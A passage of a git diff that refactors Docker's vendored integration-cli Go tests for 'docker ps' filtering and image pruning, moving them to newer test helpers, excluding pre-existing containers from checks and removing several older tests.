+	s.d.StartWithBusybox(c)
+
+	result := cli.BuildCmd(c, "test1", cli.Daemon(s.d),
+		build.WithDockerfile(`FROM busybox
+                 LABEL foo=bar`),
+		cli.WithFlags("-q"),
+	)
+	result.Assert(c, icmd.Success)
+	id1 := strings.TrimSpace(result.Combined())
+	out, err := s.d.Cmd("images", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id1)
+
+	result = cli.BuildCmd(c, "test2", cli.Daemon(s.d),
+		build.WithDockerfile(`FROM busybox
+                 LABEL bar=foo`),
+		cli.WithFlags("-q"),
+	)
+	result.Assert(c, icmd.Success)
+	id2 := strings.TrimSpace(result.Combined())
+	out, err = s.d.Cmd("images", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+
+	out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label=foo=bar")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+
+	out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label!=bar=foo")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id2)
+
+	out, err = s.d.Cmd("image", "prune", "--force", "--all", "--filter", "label=bar=foo")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, id2)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go
index 19ede90d5a..a975bc3542 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go
@@ -2,33 +2,34 @@ package main
 
 import (
 	"fmt"
-	"io/ioutil"
-	"os"
-	"os/exec"
-	"path/filepath"
 	"sort"
 	"strconv"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestPsListContainersBase(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
+	existingContainers := ExistingContainerIDs(c)
+
+	out := runSleepingContainer(c, "-d")
 	firstID := strings.TrimSpace(out)
 
-	out, _ = runSleepingContainer(c, "-d")
+	out = runSleepingContainer(c, "-d")
 	secondID := strings.TrimSpace(out)
 
 	// not long running
 	out, _ = dockerCmd(c, "run", "-d", "busybox", "true")
 	thirdID := strings.TrimSpace(out)
 
-	out, _ = runSleepingContainer(c, "-d")
+	out = runSleepingContainer(c, "-d")
 	fourthID := strings.TrimSpace(out)
 
 	// make sure the second is running
@@ -42,79 +43,79 @@ func (s *DockerSuite) TestPsListContainersBase(c *check.C) {
 
 	// all
 	out, _ = dockerCmd(c, "ps", "-a")
-	c.Assert(assertContainerList(out, []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out))
 
 	// running
 	out, _ = dockerCmd(c, "ps")
-	c.Assert(assertContainerList(out, []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out))
 
 	// limit
 	out, _ = dockerCmd(c, "ps", "-n=2", "-a")
 	expected := []string{fourthID, thirdID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-n=2")
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out))
 
 	// filter since
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-a")
 	expected = []string{fourthID, thirdID, secondID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID)
 	expected = []string{fourthID, secondID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "since="+thirdID)
 	expected = []string{fourthID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
 
 	// filter before
 	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-a")
 	expected = []string{thirdID, secondID, firstID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID)
 	expected = []string{secondID, firstID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "before="+thirdID)
 	expected = []string{secondID, firstID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out))
 
 	// filter since & before
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-a")
 	expected = []string{thirdID, secondID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID)
 	expected = []string{secondID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out))
 
 	// filter since & limit
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2", "-a")
 	expected = []string{fourthID, thirdID}
 
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2")
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out))
 
 	// filter before & limit
 	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1", "-a")
 	expected = []string{thirdID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1")
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out))
 
 	// filter since & filter before & limit
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1", "-a")
 	expected = []string{thirdID}
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out))
 
 	out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1")
-	c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out))
+	c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out))
 
 }
 
@@ -136,13 +137,6 @@ func assertContainerList(out string, expected []string) bool {
 	return true
 }
 
-// FIXME(vdemeester) Move this into a unit test in daemon package
-func (s *DockerSuite) TestPsListContainersInvalidFilterName(c *check.C) {
-	out, _, err := dockerCmdWithError("ps", "-f", "invalidFilter=test")
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "Invalid filter")
-}
-
 func (s *DockerSuite) TestPsListContainersSize(c *check.C) {
 	// Problematic on Windows as it doesn't report the size correctly @swernli
 	testRequires(c, DaemonIsLinux)
@@ -152,20 +146,18 @@ func (s *DockerSuite) TestPsListContainersSize(c *check.C) {
 	baseLines := strings.Split(strings.Trim(baseOut, "\n "), "\n")
 	baseSizeIndex := strings.Index(baseLines[0], "SIZE")
 	baseFoundsize := baseLines[1][baseSizeIndex:]
-	baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, " ")[0])
+	baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, "B")[0])
 	c.Assert(err, checker.IsNil)
 
 	name := "test_size"
 	dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo 1 > test")
-	id, err := getIDByName(name)
-	c.Assert(err, checker.IsNil)
+	id := getIDByName(c, name)
 
-	runCmd := exec.Command(dockerBinary, "ps", "-s", "-n=1")
-	var out string
+	var result *icmd.Result
 
 	wait := make(chan struct{})
 	go func() {
-		out, _, err = runCommandWithOutput(runCmd)
+		result = icmd.RunCommand(dockerBinary, "ps", "-s", "-n=1")
 		close(wait)
 	}()
 	select {
@@ -173,99 +165,105 @@ func (s *DockerSuite) TestPsListContainersSize(c *check.C) {
 	case <-time.After(3 * time.Second):
 		c.Fatalf("Calling \"docker ps -s\" timed out!")
 	}
-	c.Assert(err, checker.IsNil)
-	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+	result.Assert(c, icmd.Success)
+	lines := strings.Split(strings.Trim(result.Combined(), "\n "), "\n")
 	c.Assert(lines, checker.HasLen, 2, check.Commentf("Expected 2 lines for 'ps -s -n=1' output, got %d", len(lines)))
 	sizeIndex := strings.Index(lines[0], "SIZE")
 	idIndex := strings.Index(lines[0], "CONTAINER ID")
 	foundID := lines[1][idIndex : idIndex+12]
 	c.Assert(foundID, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s", id[:12], foundID))
-	expectedSize := fmt.Sprintf("%d B", (2 + baseBytes))
+	expectedSize := fmt.Sprintf("%dB", 2+baseBytes)
 	foundSize := lines[1][sizeIndex:]
 	c.Assert(foundSize, checker.Contains, expectedSize, check.Commentf("Expected size %q, got %q", expectedSize, foundSize))
 }
 
 func (s *DockerSuite) TestPsListContainersFilterStatus(c *check.C) {
+	existingContainers := ExistingContainerIDs(c)
+
 	// start exited container
-	out, _ := dockerCmd(c, "run", "-d", "busybox")
+	out := cli.DockerCmd(c, "run", "-d", "busybox").Combined()
 	firstID := strings.TrimSpace(out)
 
 	// make sure the exited container is not running
-	dockerCmd(c, "wait", firstID)
+	cli.DockerCmd(c, "wait", firstID)
 
 	// start running container
-	out, _ = dockerCmd(c, "run", "-itd", "busybox")
+	out = cli.DockerCmd(c, "run", "-itd", "busybox").Combined()
 	secondID := strings.TrimSpace(out)
 
 	// filter containers by exited
-	out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited")
+	out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited").Combined()
 	containerOut := strings.TrimSpace(out)
-	c.Assert(containerOut, checker.Equals, firstID)
+	c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, firstID)
 
-	out, _ = dockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running")
+	out = cli.DockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running").Combined()
 	containerOut = strings.TrimSpace(out)
-	c.Assert(containerOut, checker.Equals, secondID)
+	c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, secondID)
 
-	result := dockerCmdWithTimeout(time.Second*60, "ps", "-a", "-q", "--filter=status=rubbish")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+	result := cli.Docker(cli.Args("ps", "-a", "-q", "--filter=status=rubbish"), cli.WithTimeout(time.Second*60))
+	err := "Invalid filter 'status=rubbish'"
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		err = "Unrecognised filter value for status: rubbish"
+	}
+	result.Assert(c, icmd.Expected{
 		ExitCode: 1,
-		Err:      "Unrecognised filter value for status",
+		Err:      err,
 	})
-
 	// Windows doesn't support pausing of containers
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		// pause running container
-		out, _ = dockerCmd(c, "run", "-itd", "busybox")
+		out = cli.DockerCmd(c, "run", "-itd", "busybox").Combined()
 		pausedID := strings.TrimSpace(out)
-		dockerCmd(c, "pause", pausedID)
+		cli.DockerCmd(c, "pause", pausedID)
 		// make sure the container is unpaused to let the daemon stop it properly
-		defer func() { dockerCmd(c, "unpause", pausedID) }()
+		defer func() { cli.DockerCmd(c, "unpause", pausedID) }()
 
-		out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused")
+		out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused").Combined()
 		containerOut = strings.TrimSpace(out)
-		c.Assert(containerOut, checker.Equals, pausedID)
+		c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, pausedID)
 	}
 }
 
 func (s *DockerSuite) TestPsListContainersFilterHealth(c *check.C) {
+	existingContainers := ExistingContainerIDs(c)
 	// Test legacy no health check
-	out, _ := runSleepingContainer(c, "--name=none_legacy")
+	out := runSleepingContainer(c, "--name=none_legacy")
 	containerID := strings.TrimSpace(out)
 
-	waitForContainer(containerID)
+	cli.WaitRun(c, containerID)
 
-	out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none")
+	out = cli.DockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none").Combined()
 	containerOut := strings.TrimSpace(out)
 	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for legacy none filter, output: %q", containerID, containerOut, out))
 
 	// Test no health check specified explicitly
-	out, _ = runSleepingContainer(c, "--name=none", "--no-healthcheck")
+	out = runSleepingContainer(c, "--name=none", "--no-healthcheck")
 	containerID = strings.TrimSpace(out)
 
-	waitForContainer(containerID)
+	cli.WaitRun(c, containerID)
 
-	out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none")
+	out = cli.DockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none").Combined()
 	containerOut = strings.TrimSpace(out)
 	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for none filter, output: %q", containerID, containerOut, out))
 
 	// Test failing health check
-	out, _ = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s")
+	out = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s")
 	containerID = strings.TrimSpace(out)
 
 	waitForHealthStatus(c, "failing_container", "starting", "unhealthy")
 
-	out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy")
+	out = cli.DockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy").Combined()
 	containerOut = strings.TrimSpace(out)
 	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for unhealthy filter, output: %q", containerID, containerOut, out))
 
 	// Check passing healthcheck
-	out, _ = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s")
+	out = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s")
 	containerID = strings.TrimSpace(out)
 
 	waitForHealthStatus(c, "passing_container", "starting", "healthy")
 
-	out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy")
-	containerOut = strings.TrimSpace(out)
+	out = cli.DockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy").Combined()
+	containerOut = strings.TrimSpace(RemoveOutputForExistingElements(out, existingContainers))
 	c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for healthy filter, output: %q", containerID, containerOut, out))
 }
 
@@ -286,8 +284,7 @@ func (s *DockerSuite) TestPsListContainersFilterID(c *check.C) {
 func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) {
 	// start container
 	dockerCmd(c, "run", "--name=a_name_to_match", "busybox")
-	id, err := getIDByName("a_name_to_match")
-	c.Assert(err, check.IsNil)
+	id := getIDByName(c, "a_name_to_match")
 
 	// start another container
 	runSleepingContainer(c, "--name=b_name_to_match")
@@ -307,49 +304,43 @@ func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) {
 // - Run containers for each of those image (busybox, images_ps_filter_test1, images_ps_filter_test2)
 // - Filter them out :P
 func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) {
+	existingContainers := ExistingContainerIDs(c)
+
 	// Build images
 	imageName1 := "images_ps_filter_test1"
-	imageID1, err := buildImage(imageName1,
-		`FROM busybox
-		 LABEL match me 1`, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, imageName1, build.WithDockerfile(`FROM busybox
+		 LABEL match me 1`))
+	imageID1 := getIDByName(c, imageName1)
 
 	imageName1Tagged := "images_ps_filter_test1:tag"
-	imageID1Tagged, err := buildImage(imageName1Tagged,
-		`FROM busybox
-		 LABEL match me 1 tagged`, true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, imageName1Tagged, build.WithDockerfile(`FROM busybox
+		 LABEL match me 1 tagged`))
+	imageID1Tagged := getIDByName(c, imageName1Tagged)
 
 	imageName2 := "images_ps_filter_test2"
-	imageID2, err := buildImage(imageName2,
-		fmt.Sprintf(`FROM %s
-		 LABEL match me 2`, imageName1), true)
-	c.Assert(err, checker.IsNil)
+	buildImageSuccessfully(c, imageName2, build.WithDockerfile(fmt.Sprintf(`FROM %s
+		 LABEL match me 2`, imageName1)))
+	imageID2 := getIDByName(c, imageName2)
 
 	// start containers
 	dockerCmd(c, "run", "--name=first", "busybox", "echo", "hello")
-	firstID, err := getIDByName("first")
-	c.Assert(err, check.IsNil)
+	firstID := getIDByName(c, "first")
 
 	// start another container
 	dockerCmd(c, "run", "--name=second", "busybox", "echo", "hello")
-	secondID, err := getIDByName("second")
-	c.Assert(err, check.IsNil)
+	secondID := getIDByName(c, "second")
 
 	// start third container
 	dockerCmd(c, "run", "--name=third", imageName1, "echo", "hello")
-	thirdID, err := getIDByName("third")
-	c.Assert(err, check.IsNil)
+	thirdID := getIDByName(c, "third")
 
 	// start fourth container
 	dockerCmd(c, "run", "--name=fourth", imageName1Tagged, "echo", "hello")
-	fourthID, err := getIDByName("fourth")
-	c.Assert(err, check.IsNil)
+	fourthID := getIDByName(c, "fourth")
 
 	// start fifth container
 	dockerCmd(c, "run", "--name=fifth", imageName2, "echo", "hello")
-	fifthID, err := getIDByName("fifth")
-	c.Assert(err, check.IsNil)
+	fifthID := getIDByName(c, "fifth")
 
 	var filterTestSuite = []struct {
 		filterName  string
@@ -377,16 +368,16 @@ func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) {
 	var out string
 	for _, filter := range filterTestSuite {
 		out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+filter.filterName)
-		checkPsAncestorFilterOutput(c, out, filter.filterName, filter.expectedIDs)
+		checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), filter.filterName, filter.expectedIDs)
 	}
 
 	// Multiple ancestor filter
 	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageName2, "--filter=ancestor="+imageName1Tagged)
-	checkPsAncestorFilterOutput(c, out, imageName2+","+imageName1Tagged, []string{fourthID, fifthID})
+	checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), imageName2+","+imageName1Tagged, []string{fourthID, fifthID})
 }
 
 func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expectedIDs []string) {
-	actualIDs := []string{}
+	var actualIDs []string
 	if out != "" {
 		actualIDs = strings.Split(out[:len(out)-1], "\n")
 	}
@@ -410,18 +401,15 @@ func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expe
 func (s *DockerSuite) TestPsListContainersFilterLabel(c *check.C) {
 	// start container
 	dockerCmd(c, "run", "--name=first", "-l", "match=me", "-l", "second=tag", "busybox")
-	firstID, err := getIDByName("first")
-	c.Assert(err, check.IsNil)
+	firstID := getIDByName(c, "first")
 
 	// start another container
 	dockerCmd(c, "run", "--name=second", "-l", "match=me too", "busybox")
-	secondID, err := getIDByName("second")
-	c.Assert(err, check.IsNil)
+	secondID := getIDByName(c, "second")
 
 	// start third container
 	dockerCmd(c, "run", "--name=third", "-l", "nomatch=me", "busybox")
-	thirdID, err := getIDByName("third")
-	c.Assert(err, check.IsNil)
+	thirdID := getIDByName(c, "third")
 
 	// filter containers by exact match
 	out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me")
@@ -450,23 +438,19 @@ func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) {
 	runSleepingContainer(c, "--name=sleep")
 
 	dockerCmd(c, "run", "--name", "zero1", "busybox", "true")
-	firstZero, err := getIDByName("zero1")
-	c.Assert(err, checker.IsNil)
+	firstZero := getIDByName(c, "zero1")
 
 	dockerCmd(c, "run", "--name", "zero2", "busybox", "true")
-	secondZero, err := getIDByName("zero2")
-	c.Assert(err, checker.IsNil)
+	secondZero := getIDByName(c, "zero2")
 
 	out, _, err := dockerCmdWithError("run", "--name", "nonzero1", "busybox", "false")
 	c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err))
 
-	firstNonZero, err := getIDByName("nonzero1")
-	c.Assert(err, checker.IsNil)
+	firstNonZero := getIDByName(c, "nonzero1")
 
 	out, _, err = dockerCmdWithError("run", "--name", "nonzero2", "busybox", "false")
 	c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err))
-	secondNonZero, err := getIDByName("nonzero2")
-	c.Assert(err, checker.IsNil)
+	secondNonZero := getIDByName(c, "nonzero2")
 
 	// filter containers by exited=0
 	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=0")
@@ -486,15 +470,18 @@ func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) {
 func (s *DockerSuite) TestPsRightTagName(c *check.C) {
 	// TODO Investigate further why this fails on Windows to Windows CI
 	testRequires(c, DaemonIsLinux)
+
+	existingContainers := ExistingContainerNames(c)
+
 	tag := "asybox:shmatest"
 	dockerCmd(c, "tag", "busybox", tag)
 
 	var id1 string
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 	id1 = strings.TrimSpace(string(out))
 
 	var id2 string
-	out, _ = runSleepingContainerInImage(c, tag)
+	out = runSleepingContainerInImage(c, tag)
 	id2 = strings.TrimSpace(string(out))
 
 	var imageID string
@@ -502,11 +489,12 @@ func (s *DockerSuite) TestPsRightTagName(c *check.C) {
 	imageID = strings.TrimSpace(string(out))
 
 	var id3 string
-	out, _ = runSleepingContainerInImage(c, imageID)
+	out = runSleepingContainerInImage(c, imageID)
 	id3 = strings.TrimSpace(string(out))
 
 	out, _ = dockerCmd(c, "ps", "--no-trunc")
 	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	lines = RemoveLinesForExistingElements(lines, existingContainers)
 	// skip header
 	lines = lines[1:]
 	c.Assert(lines, checker.HasLen, 3, check.Commentf("There should be 3 running container, got %d", len(lines)))
@@ -525,46 +513,6 @@ func (s *DockerSuite) TestPsRightTagName(c *check.C) {
 	}
 }
 
-func (s *DockerSuite) TestPsLinkedWithNoTrunc(c *check.C) {
-	// Problematic on Windows as it doesn't support links as of Jan 2016
-	testRequires(c, DaemonIsLinux)
-	runSleepingContainer(c, "--name=first")
-	runSleepingContainer(c, "--name=second", "--link=first:first")
-
-	out, _ := dockerCmd(c, "ps", "--no-trunc")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-	// strip header
-	lines = lines[1:]
-	expected := []string{"second", "first,second/first"}
-	var names []string
-	for _, l := range lines {
-		fields := strings.Fields(l)
-		names = append(names, fields[len(fields)-1])
-	}
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array: %v, got: %v", expected, names))
-}
-
-func (s *DockerSuite) TestPsGroupPortRange(c *check.C) {
-	// Problematic on Windows as it doesn't support port ranges as of Jan 2016
-	testRequires(c, DaemonIsLinux)
-	portRange := "3850-3900"
-	dockerCmd(c, "run", "-d", "--name", "porttest", "-p", portRange+":"+portRange, "busybox", "top")
-
-	out, _ := dockerCmd(c, "ps")
-
-	c.Assert(string(out), checker.Contains, portRange, check.Commentf("docker ps output should have had the port range %q: %s", portRange, string(out)))
-
-}
-
-func (s *DockerSuite) TestPsWithSize(c *check.C) {
-	// Problematic on Windows as it doesn't report the size correctly @swernli
-	testRequires(c, DaemonIsLinux)
-	dockerCmd(c, "run", "-d", "--name", "sizetest", "busybox", "top")
-
-	out, _ := dockerCmd(c, "ps", "--size")
-	c.Assert(out, checker.Contains, "virtual", check.Commentf("docker ps with --size should show virtual size of container"))
-}
-
 func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) {
 	// create a container
 	out, _ := dockerCmd(c, "create", "busybox")
@@ -595,73 +543,6 @@ func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) {
 	c.Assert(cID, checker.HasPrefix, containerOut)
 }
 
-func (s *DockerSuite) TestPsFormatMultiNames(c *check.C) {
-	// Problematic on Windows as it doesn't support link as of Jan 2016
-	testRequires(c, DaemonIsLinux)
-	//create 2 containers and link them
-	dockerCmd(c, "run", "--name=child", "-d", "busybox", "top")
-	dockerCmd(c, "run", "--name=parent", "--link=child:linkedone", "-d", "busybox", "top")
-
-	//use the new format capabilities to only list the names and --no-trunc to get all names
-	out, _ := dockerCmd(c, "ps", "--format", "{{.Names}}", "--no-trunc")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-	expected := []string{"parent", "child,parent/linkedone"}
-	var names []string
-	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names))
-
-	//now list without turning off truncation and make sure we only get the non-link names
-	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}}")
-	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
-	expected = []string{"parent", "child"}
-	var truncNames []string
-	truncNames = append(truncNames, lines...)
-	c.Assert(expected, checker.DeepEquals, truncNames, check.Commentf("Expected array with truncated names: %v, got: %v", expected, truncNames))
-}
-
